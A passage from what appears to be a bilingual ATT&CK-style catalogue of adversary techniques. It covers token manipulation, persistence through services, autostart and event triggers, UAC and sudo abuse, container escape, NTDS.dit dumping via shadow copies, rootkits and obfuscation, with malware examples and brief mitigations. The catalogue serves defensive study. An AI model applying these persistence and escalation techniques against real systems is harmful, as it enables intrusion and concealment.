impersonation technique to escalate privileges. Blue Mockingbird has used JuicyPotato to abuse the <code>SeImpersonate</code> token privilege to escalate from web application pool accounts to NT Authority\SYSTEM. Duqu examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges. SslMM contains a feature to manipulate process privileges and tokens. PowerSploit's <code>Invoke-TokenManipulation</code> Exfiltration module can be used to manipulate tokens. Hydraq creates a backdoor through which remote attackers can adjust token privileges. Empire can use PowerSploit's <code>Invoke-TokenManipulation</code> to manipulate access tokens. PoshC2 can use Invoke-TokenManipulation for manipulating tokens. Ryuk has attempted to adjust its token privileges to have the <code>SeDebugPrivilege</code>. SUNSPOT modified its security token to grants itself debugging privileges by adding <code>SeDebugPrivilege</code>. MegaCortex can enable <code>SeDebugPrivilege</code> and adjust token privileges. KillDisk has attempted to get the access token of a process by calling <code>OpenProcessToken</code>. If KillDisk gets the access token, then it attempt to modify the token privileges with <code>AdjustTokenPrivileges</code>. AppleSeed can gain system level privilege by passing <code>SeDebugPrivilege</code> to the <code>AdjustTokenPrivilege</code> API. Cuba has used <code>SeDebugPrivilege</code> and <code>AdjustTokenPrivileges</code> to elevate privileges. Sliver has the ability to manipulate user tokens on targeted Windows systems. Gelsemium can use token manipulation to bypass UAC on Windows7 systems. HermeticWiper can use `AdjustTokenPrivileges` to grant itself privileges for debugging with `SeDebugPrivilege`, creating backups with `SeBackupPrivilege`, loading drivers with `SeLoadDriverPrivilege`, and shutting down a local system with `SeShutdownPrivilege`. Mafalda can use `AdjustTokenPrivileges()` to elevate privileges. BlackCat has the ability modify access tokens. Sagerunex finds the `explorer.exe` process after execution and uses it to change the token of its executing thread. Qilin can use an embedded Mimikatz module for token manipulation. 敵対者は、グループポリシーやテナントポリシーを改変して権限昇格や防御妨害を行うことがある。 Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation. 敵対者は、グループポリシーを改変して権限昇格や防御妨害を行うことがある。Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`. 敵対者は、ドメイン/テナントの信頼関係を改変して権限昇格や防御妨害を行うことがある。Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources. These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 ドメイン/テナントポリシーの変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、サービスやデーモン等のシステムプロセスを作成/変更して永続化することがある。 Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. On macOS, launchd processes known as Launch Daemon and Launch Agent are run to finish system initialization and load user specific parameters. 敵対者は、Launch Agentを作成/変更してmacOSで永続化することがある。Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>. Property list files use the <code>Label</code>, <code>ProgramArguments </code>, and <code>RunAtLoad</code> keys to identify the Launch Agent's name, executable location, and execution time. Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks. 敵対者は、systemdサービスを作成/変更してLinuxで永続化することがある。Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources. Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. 敵対者は、Windowsサービスを作成/変更して永続化することがある。Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. 敵対者は、Launch Daemonを作成/変更してmacOSで永続化することがある。Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks. 敵対者は、コンテナサービスを作成/変更して永続化することがある。Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 OSを安全に構成し、攻撃対象領域を縮小する。 ソフトウェアのインストールを制限し、不正なプログラム導入を防ぐ。 エンドポイントで悪意ある挙動を検出・防止する。 コード署名を検証し、未署名・不正なコードの実行を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを安全に構成し、悪用を防ぐ。 システムプロセスの作成/変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Exaramel for Linux has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root. LITTLELAMB.WOOLTEA can initialize itself as a daemon to run persistently in the background. LunarMail can create an arbitrary process with a specified command line and redirect its output to a staging directory. IMAPLoader modifies Windows tasks on the victim machine to reference a retrieved PE file through a path modification. BOLDMOVE can free all resources and terminate itself on victim machines. Akira _v2 can create a child process for encryption. BRICKSTORM has created a new background session and has spawned a child process of a parent process when it determines it is not running in its intended state. 敵対者は、特定イベントを契機に悪意あるコードが実行されるよう設定して永続化することがある。 Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events. 敵対者は、既定のファイル関連付けを変更してイベント契機でコードを実行することがある。Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. 敵対者は、スクリーンセーバーを悪用してコードを実行することがある。Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations. 敵対者は、WMIイベントサブスクリプションを悪用してイベント契機で実行・永続化することがある。Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime. 敵対者は、Unixシェルの構成ファイルを改変してコードを実行することがある。Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. 敵対者は、シェルのtrapを悪用してシグナル契機でコードを実行することがある。Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. 敵対者は、LC_LOAD_DYLIBを追加してmach-oバイナリにコードをロードさせることがある。Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. There are tools available to perform these changes. 敵対者は、NetshヘルパDLLを悪用して永続化することがある。Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>. 敵対者は、アクセシビリティ機能(stickykeys等)を悪用してコードを実行することがある。Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. 敵対者は、AppCert DLLを悪用してコードを実行・永続化することがある。Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. 敵対者は、AppInit DLLを悪用してコードを実行・永続化することがある。Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. 敵対者は、アプリケーションシミング(shim)を悪用して永続化することがある。Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. 敵対者は、IFEOインジェクションを悪用してデバッガ起動契機で実行することがある。Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>). 敵対者は、PowerShellプロファイルを改変してコードを実行・永続化することがある。Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. 敵対者は、Emondを悪用してイベント契機でコードを実行することがある。Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a Launch Daemon that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place. 敵対者は、COMハイジャックを悪用してコードを実行・永続化することがある。Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system. References to various COM objects are stored in the Registry. 敵対者は、インストーラパッケージを悪用してコードを実行・永続化することがある。Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation. 敵対者は、udevルールを悪用してデバイスイベント契機で実行することがある。Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename. 敵対者は、Python起動フックを悪用してコードを実行することがある。Adversaries may achieve persistence by leveraging Python’s startup mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py` or `usercustomize.py` modules. These files are automatically processed during the initialization of the Python interpreter, allowing for the execution of arbitrary code whenever Python is invoked. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 イベントトリガー実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 KV Botnet Activity involves managing events on victim systems via <code>libevent</code> to execute a callback function when any running process contains the following references in their path without also having a reference to <code>bioset</code>: busybox, wget, curl, tftp, telnetd, or lua. If the <code>bioset</code> string is not found, the related process is terminated. XCSSET's `dfhsebxzod` module searches for `.xcodeproj` directories within the user’s home folder and subdirectories. For each match, it locates the corresponding `project.pbxproj` file and embeds an encoded payload into a build rule, target configuration, or project setting. The payload is later executed during the build process. Pacu can set up S3 bucket notifications to trigger a malicious Lambda function when a CloudFormation template is uploaded to the bucket. It can also create Lambda functions that trigger upon the creation of users, roles, and groups. UPSTYLE creates a `.pth` file beginning with the text `import` so that any time another process or script attempts to reference the modified item the malicious code will also run. 敵対者は、起動/ログオン時の自動実行機構を悪用して永続化することがある。 Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon. These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. 敵対者は、レジストリRunキーやスタートアップフォルダを悪用して永続化することがある。Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level. 敵対者は、認証パッケージを悪用してコードを実行・永続化することがある。Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. 敵対者は、タイムプロバイダを悪用してコードを実行・永続化することがある。Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. 敵対者は、WinlogonヘルパDLLを悪用して永続化することがある。Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. 敵対者は、セキュリティサポートプロバイダ(SSP)を悪用して永続化することがある。Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. 敵対者は、カーネルモジュールや拡張を悪用して永続化することがある。Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. 敵対者は、再オープンアプリケーション機能を悪用して永続化することがある。Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in". When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory. Applications listed in this file are automatically reopened upon the user’s next logon. 敵対者は、LSASSドライバを悪用してコードを実行・永続化することがある。Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. 敵対者は、ショートカット(.lnk)を改変して永続化することがある。Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. 敵対者は、ポートモニタを悪用して永続化することがある。Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup. This DLL can be located in <code>C:\Windows\System32</code> and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot. 敵対者は、プリントプロセッサを悪用して永続化することがある。Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot. 敵対者は、XDG自動起動エントリを悪用してLinuxで永続化することがある。Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media. 敵対者は、Active Setupを悪用して永続化することがある。Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer. These programs will be executed under the context of the user and will have the account's associated permissions level. 敵対者は、ログインアイテムを悪用してmacOSで永続化することがある。Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in. Login items can be added via a shared file list or Service Management Framework. Shared file list login items can be set using scripting languages such as AppleScript, whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>. 起動/ログオン時の自動実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 APT42 has modified the Registry to maintain persistence. Misdat has created registry keys for persistence, including `HKCU\Software\dnimtsoleht\StubPath`, `HKCU\Software\snimtsOleht\StubPath`, `HKCU\Software\Backtsaleht\StubPath`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed. Components\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`. Mis-Type has created registry keys for persistence, including `HKCU\Software\bkfouerioyou`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{6afa8072-b2b1-31a8-b5c1-{Unique Identifier}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3BF41072-B2B1-31A8-B5C1-{Unique Identifier}`. Dtrack’s RAT makes a persistent target file with auto execution on the host start. BoxCaon established persistence by setting the <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load</code> registry key to point to its executable. xCaon has added persistence via the Registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load</code> which causes the malware to run each time any user logs in. 敵対者は、UACやsudo等の昇格制御メカニズムを悪用して権限昇格することがある。 Adversaries may circumvent mechanisms designed to control privilege elevation to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system. 敵対者は、setuid/setgidを悪用して権限昇格することがある。An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively. Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges. 敵対者は、UAC(ユーザーアカウント制御)をバイパスして権限昇格することがある。Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. 敵対者は、sudoやsudoキャッシュを悪用して権限昇格することがある。Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. 敵対者は、プロンプト付き昇格実行(AuthorizationExecuteWithPrivileges等)を悪用することがある。Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials. The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. 敵対者は、一時的な昇格クラウドアクセスを悪用して権限昇格することがある。Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. 敵対者は、macOSのTCCを操作して権限/アクセスを得ることがある。Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA). アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 OSを安全に構成し、攻撃対象領域を縮小する。 許可されていないコードの実行を防止する。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 UACを適切に構成し、権限昇格を防ぐ。 昇格制御メカニズムの悪用に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 UNC3886 has used vSphere Installation Bundles (VIBs) that contained modified descriptor XML files with the `acceptance-level` set to `partner` which allowed for privilege escalation. Raspberry Robin implements a variation of the <code>ucmDccwCOMMethod</code> technique abusing the Windows AutoElevate backdoor to bypass UAC while elevating privileges. 敵対者は、コンテナからホストへエスケープして権限昇格することがある。 Adversaries may break out of a container or virtualized environment to gain access to the underlying host. This can allow an adversary access to other containerized or virtualized resources from the host level or to the host itself. In principle, containerized / virtualized resources should provide a clear separation of application functionality and be isolated from the host environment. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 許可されていないコードの実行を防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 アプリを分離・サンドボックス化し、影響範囲を限定する。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 ホストへのエスケープに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 TeamTNT has deployed privileged containers that mount the filesystem of victim machine. Doki’s container was configured to bind the host root directory. Hildegard has used the BOtB tool that can break out of containers. Siloscape maps the host’s C drive to the container by creating a global symbolic link to the host through the calling of <code>NtSetInformationSymbolicLink</code>. Peirates can gain a reverse shell on a host node by mounting the Kubernetes hostPath. 敵対者は、ボリュームへ直接アクセスしてファイルシステムの保護を回避することがある。 Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. アカウントの作成・権限・ライフサイクルを適切に管理する。 エンドポイントで悪意ある挙動を検出・防止する。 ボリュームへの直接アクセスに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During APT28 Nearest Neighbor Campaign, APT28 accessed volume shadow copies through executing <code>vssadmin</code> in order to dump the NTDS.dit file. During the 2025 Poland Wiper Attacks, the adversaries copied volume shadow copies through executing `vssadmin` in order to dump the `NTDS.dit` file. Scattered Spider has created volume shadow copies of virtual domain controller disks to extract the `NTDS.dit` file. Volt Typhoon has executed the Windows-native `vssadmin` command to create volume shadow copies. esentutl can use the Volume Shadow Copy service to copy locked files such as `ntds.dit`. 敵対者は、ルートキットを用いて自身の存在を隠蔽することがある。 Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. ルートキットに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 ArcaneDoor included hooking the `processHostScanReply()` function on victim Cisco ASA devices. During RedPenguin, UNC3886 used rootkits such as REPTILE and MEDUSA. APT28 has used a UEFI (Unified Extensible Firmware Interface) rootkit known as LoJax. Winnti Group used a rootkit to modify typical server functionality. APT41 deployed rootkits on Linux systems. Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists. TeamTNT has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine. UNC3886 has used the publicly available rootkits REPTILE and MEDUSA on targeted VMs. Hikit is a Rootkit that has been used by Axiom. PoisonIvy starts a rootkit from a malicious file dropped to disk. Uroburos can use its kernel module to prevent its host components from being listed by the targeted system's OS and to mediate requests between user mode and concealed components. Zeroaccess is a kernel-mode rootkit. HTRAN can install a rootkit to hide network connections from the host OS. Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems. HIDEDRV is a rootkit that hides certain operating system artifacts. Umbreon hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware. Ebury acts as a user land rootkit using the SSH service. HiddenWasp uses a rootkit to hook and implement functions on the system. LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems. Winnti for Linux has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity. Ramsay has included a rootkit to evade defenses. Skidmap is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low. Carberp has used user mode rootkit techniques to remain hidden on the system. Drovorub has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view. Caterpillar WebShell has a module to use a rootkit on a system. Hildegard has modified /etc/ld.so.preload to overwrite readdir() and readdir64(). Stuxnet uses a Windows rootkit to mask its binaries and other relevant files. WarzoneRAT can include a rootkit to hide processes, files, and startup. COATHANGER hooks or replaces multiple legitimate processes and other functions on victim devices. Line Dancer can hook both the crash dump process and the Autehntication, Authorization, and Accounting (AAA) functions on compromised machines to evade forensic analysis and authentication mechanisms. REPTILE has the ability to hook kernel functions and modify functions data to achieve rootkit functionality such as hiding processes and network connections. MEDUSA is a rootkit with command execution and credential logging capabilities. 敵対者は、ファイルや情報を難読化して検知や分析を回避することがある。 Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 敵対者は、ファイルに無意味なデータを詰めてサイズやハッシュを変え、検知を回避することがある。Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 敵対者は、ソフトウェアパッカーで実行ファイルを圧縮・暗号化して解析や検知を回避することがある。Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code. 